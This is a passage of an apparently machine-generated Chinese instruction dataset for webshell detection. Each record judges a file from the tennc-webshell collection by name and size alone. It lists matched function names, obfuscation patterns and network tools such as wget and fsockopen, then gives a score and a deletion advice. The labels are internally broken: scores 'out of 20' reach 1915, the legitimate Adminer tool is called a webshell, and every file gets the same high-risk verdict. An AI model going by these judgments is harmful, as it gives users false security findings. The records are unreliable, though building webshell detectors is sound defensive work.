"tennc-webshell/php/PHPshell/c99_locus7s/c99_locus7s.php", "malicious_score": 491, "md5_hash": "38fd7e45f9c11a37463c3ded1c76af4c"}} {"instruction": "分析这个python文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"phpkit.py\", \"文件类型\": \"python\", \"文件大小\": \"728 bytes\", \"行数\": 28}", "output": "这是一个python类型的webshell文件。 检测到恶意函数: input(, raw_input( 包含网络功能: requests\\. 恶意度评分: 7/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_python_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/phpkit-0.1a/phpkit.py", "malicious_score": 7, "md5_hash": "edbd7adb9150e14238d9b5fb2a9301d3"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"odd.php\", \"文件类型\": \"php\", \"文件大小\": \"425 bytes\", \"行数\": 10}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: system(, eval( 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/phpkit-0.1a/odd.php", "malicious_score": 6, "md5_hash": "3c30399e7480c09276f412271f60ed01"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"wpes-v0.2.php\", \"文件类型\": \"php\", \"文件大小\": \"11060 bytes\", \"行数\": 255}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: shell_exec (, $_POST[, exec(, exec (, system( 恶意度评分: 99/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/wpes/wpes-v0.2.php", "malicious_score": 99, "md5_hash": "a89f9aabcfdcb815938ae6a42b0b539a"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"bh.php\", \"文件类型\": \"php\", \"文件大小\": \"251850 bytes\", \"行数\": 13}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: str_rot13(, gzinflate(, eval(, base64_decode( 发现混淆技术: base64_decode, gzinflate, str_rot13 恶意度评分: 21/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/twitter/bh.php", "malicious_score": 21, "md5_hash": "8421dbc286d27630ee1316e2702bede0"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"bukapalapak.php\", \"文件类型\": \"php\", \"文件大小\": \"4469 bytes\", \"行数\": 118}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, eval(, exec(, base64_decode( 发现混淆技术: base64_decode 包含网络功能: curl_exec 具备文件操作能力: fopen\\s*\\( 恶意度评分: 28/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/twitter/bukapalapak.php", "malicious_score": 28, "md5_hash": "993b9c1afdba4d633d5d407c5682ca76"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"adminer-4.2.4.php\", \"文件类型\": \"php\", \"文件大小\": \"518187 bytes\", \"行数\": 5584}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[, file_get_contents(, fwrite(, $_COOKIE[, $_POST[ 发现混淆技术: unpack\\s*\\(, base64_decode, pack\\s*\\( 具备文件操作能力: fopen\\s*\\(, unlink\\s*\\(, fwrite\\s*\\( 恶意度评分: 1622/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/twitter/adminer-4.2.4.php", "malicious_score": 1622, "md5_hash": "a48e0f6c6cbe6a3551630d81f48da13c"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"qyt0dHv1.php\", \"文件类型\": \"php\", \"文件大小\": \"227684 bytes\", \"行数\": 4255}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_put_contents(, str_rot13(, gzinflate(, file_get_contents(, $_GET[ 发现混淆技术: base64_decode, gzinflate, str_rot13 包含网络功能: wget, file_get_contents\\s*\\(\\s*[\"\\']https?://, curl_exec 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 885/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/twitter/qyt0dHv1.php", "malicious_score": 885, "md5_hash": "1f41ffa4ac622d0952bc3104b393365b"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"gamestopceker.php\", \"文件类型\": \"php\", \"文件大小\": \"18692 bytes\", \"行数\": 476}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[, exec (, eval(, $_POST[, base64_decode( 发现混淆技术: base64_decode 包含网络功能: curl_exec 具备文件操作能力: unlink\\s*\\( 恶意度评分: 70/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/twitter/gamestopceker.php", "malicious_score": 70, "md5_hash": "c6ede92f82c0257bfb0e9e5479d3ce51"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"1n73ction.php\", \"文件类型\": \"php\", \"文件大小\": \"344132 bytes\", \"行数\": 4708}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_put_contents(, $_REQUEST[, base64_decode (, gzinflate(, file_get_contents( 发现混淆技术: unpack\\s*\\(, ord\\s*\\(, chr\\s*\\( 包含网络功能: curl_exec, wget, fsockopen 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 1250/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/twitter/1n73ction.php", "malicious_score": 1250, "md5_hash": "a4a6e8ef1a5da87dc34f38c8fd327f1a"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"promailerv2.php\", \"文件类型\": \"php\", \"文件大小\": \"103749 bytes\", \"行数\": 3409}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: preg_replace('/([\\000-\\011\\013\\014\\016-\\037\\075\\077\\137\\177-\\377])/e, create_function(, fwrite(, preg_replace(\"/([\\(\\)\\\"])/e, fputs( 发现混淆技术: base64_decode, ord\\s*\\( 包含网络功能: fsockopen 具备文件操作能力: fopen\\s*\\(, unlink\\s*\\(, fwrite\\s*\\( 恶意度评分: 98/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/twitter/promailerv2.php", "malicious_score": 98, "md5_hash": "dc91bbe5c9c46fd6d7784be013750989"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"mailer.php\", \"文件类型\": \"php\", \"文件大小\": \"5436 bytes\", \"行数\": 204}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, eval(, base64_decode( 发现混淆技术: base64_decode 恶意度评分: 26/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/twitter/mailer.php", "malicious_score": 26, "md5_hash": "4982110c698598ef223993c6d064b534"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"v4xGus6X.php\", \"文件类型\": \"php\", \"文件大小\": \"226465 bytes\", \"行数\": 6240}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[, gzinflate(, file_get_contents(, $_GET[, fwrite( 发现混淆技术: base64_decode, gzinflate, ord\\s*\\( 包含网络功能: wget, file_get_contents\\s*\\(\\s*[\"\\']https?://, fsockopen 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 1915/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/twitter/v4xGus6X.php", "malicious_score": 1915, "md5_hash": "ceea79629a2ff0c79143b4e12e7b01ea"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"wso-ng.php\", \"文件类型\": \"php\", \"文件大小\": \"85741 bytes\", \"行数\": 1671}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_put_contents(, gzinflate(, file_get_contents(, fwrite(, $_COOKIE[ 发现混淆技术: ord\\s*\\(, chr\\s*\\(, base64_decode 包含网络功能: wget, fsockopen, curl_exec 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 991/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/wso-ng/wso-ng.php", "malicious_score": 991, "md5_hash": "2abd681c2c490c6617493c4f83feb68f"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"wsoExGently.php\", \"文件类型\": \"php\", \"文件大小\": \"6560 bytes\", \"行数\": 203}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fwrite(, system( 发现混淆技术: pack\\s*\\(, ord\\s*\\(, chr\\s*\\( 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\( 恶意度评分: 29/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/wso-ng/wsoExGently.php", "malicious_score": 29, "md5_hash": "caaa4ee6a9712431699e8e25577f9205"}} {"instruction": "分析这个python文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"phpkit.py\", \"文件类型\": \"python\", \"文件大小\": \"3361 bytes\", \"行数\": 106}", "output": "这是一个python类型的webshell文件。 检测到恶意函数: raw_input(, input(, eval(, exec( 发现混淆技术: base64_decode 包含网络功能: requests\\. 恶意度评分: 36/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_python_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/phpkit-0.2a/phpkit.py", "malicious_score": 36, "md5_hash": "7da93f0661aa06e4e1ea52c9d0d4809c"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"odd.php\", \"文件类型\": \"php\", \"文件大小\": \"425 bytes\", \"行数\": 10}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: system(, eval( 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/phpkit-0.2a/odd.php", "malicious_score": 6, "md5_hash": "3c30399e7480c09276f412271f60ed01"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"code.php\", \"文件类型\": \"php\", \"文件大小\": \"35328 bytes\", \"行数\": 1033}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[, file_get_contents(, $_COOKIE[, eval(, $_POST[ 具备文件操作能力: mkdir\\s*\\(, move_uploaded_file, unlink\\s*\\( 恶意度评分: 148/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/blackbin/v1/code.php", "malicious_score": 148, "md5_hash": "a444014c134ff24c0be5a05c02b81a79"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"dev_core.php\", \"文件类型\": \"php\", \"文件大小\": \"7037 bytes\", \"行数\": 239}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_put_contents(, $_COOKIE[, fwrite(, eval(, $_POST[ 发现混淆技术: pack\\s*\\( 包含网络功能: fsockopen 具备文件操作能力: file_put_contents, fwrite\\s*\\( 恶意度评分: 38/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/blackbin/v1/dev_core.php", "malicious_score": 38, "md5_hash": "55ad9309b006884f660c41e53150fc2e"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"idc.php\", \"文件类型\": \"php\", \"文件大小\": \"187 bytes\", \"行数\": 7}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: eval(, $_GET[ 恶意度评分: 12/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/wsb/idc.php", "malicious_score": 12, "md5_hash": "7c5b1b30196c51f1accbffb80296395f"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"webshell.php\", \"文件类型\": \"php\", \"文件大小\": \"392 bytes\", \"行数\": 10}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: assert(, file_get_contents(, create_function(, $_POST[, call_user_func( 发现混淆技术: pack\\s*\\( 恶意度评分: 29/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/tank96a/webshell.php", "malicious_score": 29, "md5_hash": "8c765dd11adacdc4e8aebda8484c349c"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"getcode.php\", \"文件类型\": \"php\", \"文件大小\": \"145 bytes\", \"行数\": 7}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: assert(, $_POST[, $_GET[ 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/tank96a/getcode.php", "malicious_score": 9, "md5_hash": "d38920b1f6aa9bcc976df1f350e5963f"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Ani-Shell.php\", \"文件类型\": \"php\", \"文件大小\": \"87016 bytes\", \"行数\": 2480}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: gzinflate(, file_get_contents(, $_GET[, fwrite(, fputs( 发现混淆技术: base64_decode, gzinflate 包含网络功能: fsockopen, socket_create 具备文件操作能力: fopen\\s*\\(, move_uploaded_file, unlink\\s*\\( 恶意度评分: 556/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/Ani-Shell/Ani-Shell.php", "malicious_score": 556, "md5_hash": "a7fe5f28df56d66e43dcd3b92f024113"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"SaiProbe_v1.0.php\", \"文件类型\": \"php\", \"文件大小\": \"11554 bytes\", \"行数\": 257}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_get_contents(, $_GET[, exec(, system(, eval( 包含网络功能: fsockopen 恶意度评分: 82/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/SaiProbe/SaiProbe_v1.0.php", "malicious_score": 82, "md5_hash": "175a9172b73a7d6df9d737de7b355a48"}} {"instruction": "分析这个python文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"client.py\", \"文件类型\": \"python\", \"文件大小\": \"1279 bytes\", \"行数\": 41}", "output": "这是一个python类型的webshell文件。 检测到恶意函数: input(, raw_input( 包含网络功能: urllib 恶意度评分: 7/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_python_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/php-sh/client.py", "malicious_score": 7, "md5_hash": "c98b3d7d977ce9f54116d6493b7aaa56"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"yaps.php\", \"文件类型\": \"php\", \"文件大小\": \"35026 bytes\", \"行数\": 905}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_put_contents(, $_REQUEST[, file_get_contents(, $_GET[, fwrite( 发现混淆技术: base64_decode, ord\\s*\\(, chr\\s*\\( 包含网络功能: wget, fsockopen, curl_exec 具备文件操作能力: fopen\\s*\\(, file_put_contents, move_uploaded_file 恶意度评分: 451/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/YAPS/yaps.php", "malicious_score": 451, "md5_hash": "62af9f9e6ac3dbddafe6434431409571"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"pas.php\", \"文件类型\": \"php\", \"文件大小\": \"21008 bytes\", \"行数\": 255}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_COOKIE[, gzinflate(, create_function( 发现混淆技术: gzinflate, ord\\s*\\(, chr\\s*\\( 恶意度评分: 21/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/pas/pas.php", "malicious_score": 21, "md5_hash": "e67ef9481220842444ab0c69dfb7e0b5"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \".v.php\", \"文件类型\": \"php\", \"文件大小\": \"84104 bytes\", \"行数\": 1634}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_put_contents(, file_get_contents(, fwrite(, $_COOKIE[, fputs( 发现混淆技术: base64_decode, hex2bin, ord\\s*\\( 包含网络功能: wget, curl_exec 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 1121/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/zxc/.v.php", "malicious_score": 1121, "md5_hash": "029bf20f372f67c6c2b575e77baacace"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"shell.php\", \"文件类型\": \"php\", \"文件大小\": \"111001 bytes\", \"行数\": 2130}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_put_contents(, $_REQUEST[, gzinflate(, file_get_contents(, $_GET[ 发现混淆技术: unpack\\s*\\(, base64_decode, gzinflate 包含网络功能: wget, fsockopen, socket_create 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 734/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/zxc/shell.php", "malicious_score": 734, "md5_hash": "f3246cd660c5cb9df0f54fa178c595ff"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"bypass403.php\", \"文件类型\": \"php\", \"文件大小\": \"12974 bytes\", \"行数\": 171}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, eval(, $_GET[ 发现混淆技术: ord\\s*\\(, chr\\s*\\( 具备文件操作能力: unlink\\s*\\( 恶意度评分: 110/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/zxc/bypass403.php", "malicious_score": 110, "md5_hash": "b4ce5a9d930019b41fb039cc48c2fadc"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"odd.php\", \"文件类型\": \"php\", \"文件大小\": \"179 bytes\", \"行数\": 5}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: system(, eval( 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/phpkit-1.0/odd.php", "malicious_score": 6, "md5_hash": "594d1b1311bbef38a0eb3d6cbb1ab538"}} {"instruction": "分析这个python文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"phpkitcli.py\", \"文件类型\": \"python\", \"文件大小\": \"4381 bytes\", \"行数\": 132}", "output": "这是一个python类型的webshell文件。 检测到恶意函数: raw_input(, input(, eval(, exec( 发现混淆技术: base64_decode 包含网络功能: requests\\. 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\( 恶意度评分: 38/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_python_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/phpkit-1.0/phpkitcli.py", "malicious_score": 38, "md5_hash": "127b2a5db04e6ff28716e766793497ac"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"mysql_1.php\", \"文件类型\": \"php\", \"文件大小\": \"3195 bytes\", \"行数\": 73}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[, fputs(, base64_decode( 发现混淆技术: base64_decode 具备文件操作能力: fopen\\s*\\( 恶意度评分: 27/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/drag/mysql_1.php", "malicious_score": 27, "md5_hash": "959e0a3e22f472c120cec8e00e498164"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"mysql数据库脱单个表.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"2813 bytes\", \"行数\": 83}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName 恶意度评分: 36/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/drag/mysql数据库脱单个表.jsp", "malicious_score": 36, "md5_hash": "8be6bf08adf7e006ca0aeec91de99607"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"MSSQL.asp\", \"文件类型\": \"asp\", \"文件大小\": \"69002 bytes\", \"行数\": 1579}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: response.Write, Execute(, execute(, Request.QueryString, Response.write 发现混淆技术: chr\\s*\\( 恶意度评分: 551/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/drag/MSSQL.asp", "malicious_score": 551, "md5_hash": "33eee88de9ee16eee1450e712eda06ea"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"system.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"16864 bytes\", \"行数\": 609}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: response.getWriter, request.getParameter, Class.forName 恶意度评分: 18/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/drag/system.jsp", "malicious_score": 18, "md5_hash": "15ae237cf395fb24cf12bff141fb3f7c"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"decrypt.php\", \"文件类型\": \"php\", \"文件大小\": \"27637 bytes\", \"行数\": 745}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fwrite(, $_POST[, $_GET[, base64_decode( 发现混淆技术: base64_decode 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 178/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/upsi1on/webshell/sungux/decrypt.php", "malicious_score": 178, "md5_hash": "5c140b380a99fc33fbf021cffda5c137"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"encrypt.php\", \"文件类型\": \"php\", \"文件大小\": \"5777 bytes\", \"行数\": 3}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: eval(, base64_decode( 发现混淆技术: base64_decode 恶意度评分: 11/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/upsi1on/webshell/sungux/encrypt.php", "malicious_score": 11, "md5_hash": "ec002033916ca1a6601bc9bc34ae8442"}} {"instruction": "分析这个python文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"back.py\", \"文件类型\": \"python\", \"文件大小\": \"1522 bytes\", \"行数\": 64}", "output": "这是一个python类型的webshell文件。 检测到恶意函数: os.system(, subprocess. 恶意度评分: 15/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_python_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/b4tm4n-toolz/backconnect/back.py", "malicious_score": 15, "md5_hash": "9ee58c793c2e220f734590960c2d369f"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"back.php\", \"文件类型\": \"php\", \"文件大小\": \"2976 bytes\", \"行数\": 128}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fwrite( 包含网络功能: fsockopen 具备文件操作能力: fwrite\\s*\\( 恶意度评分: 38/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/b4tm4n-toolz/backconnect/back.php", "malicious_score": 38, "md5_hash": "2a1dec850a1d2a2d8464122fca81e4bc"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"adminer-4.5.0.php\", \"文件类型\": \"php\", \"文件大小\": \"451104 bytes\", \"行数\": 5787}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[, file_get_contents(, fwrite(, $_COOKIE[, $_POST[ 发现混淆技术: unpack\\s*\\(, base64_decode, pack\\s*\\( 具备文件操作能力: fopen\\s*\\(, unlink\\s*\\(, fwrite\\s*\\( 恶意度评分: 1685/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/b4tm4n-toolz/database/adminer-4.5.0.php", "malicious_score": 1685, "md5_hash": "aa299fb448ae017bcdd42b9c7e88252d"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"devshell.php\", \"文件类型\": \"php\", \"文件大小\": \"26186 bytes\", \"行数\": 21}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: eval(, base64_decode( 发现混淆技术: base64_decode 恶意度评分: 8/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/Backdoor Dev Shells/devshell.php", "malicious_score": 8, "md5_hash": "d9c087b9afef970361fe61ae918d1388"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"devshell.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"65042 bytes\", \"行数\": 1244}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Request.QueryString, Response.Write, Request.Form 发现混淆技术: base64_decode, chr\\s*\\( 具备文件操作能力: mkdir\\s*\\( 恶意度评分: 155/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/Backdoor Dev Shells/devshell.aspx", "malicious_score": 155, "md5_hash": "7981f1bf9b8e5f4691e4ac440f1ba251"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"devshell.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"64630 bytes\", \"行数\": 1319}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 233/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/Backdoor Dev Shells/devshell.jsp", "malicious_score": 233, "md5_hash": "816d7a00ae40ae6d84f9223af2c02f17"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"devilzShell.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"65042 bytes\", \"行数\": 1244}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Request.QueryString, Response.Write, Request.Form 发现混淆技术: base64_decode, 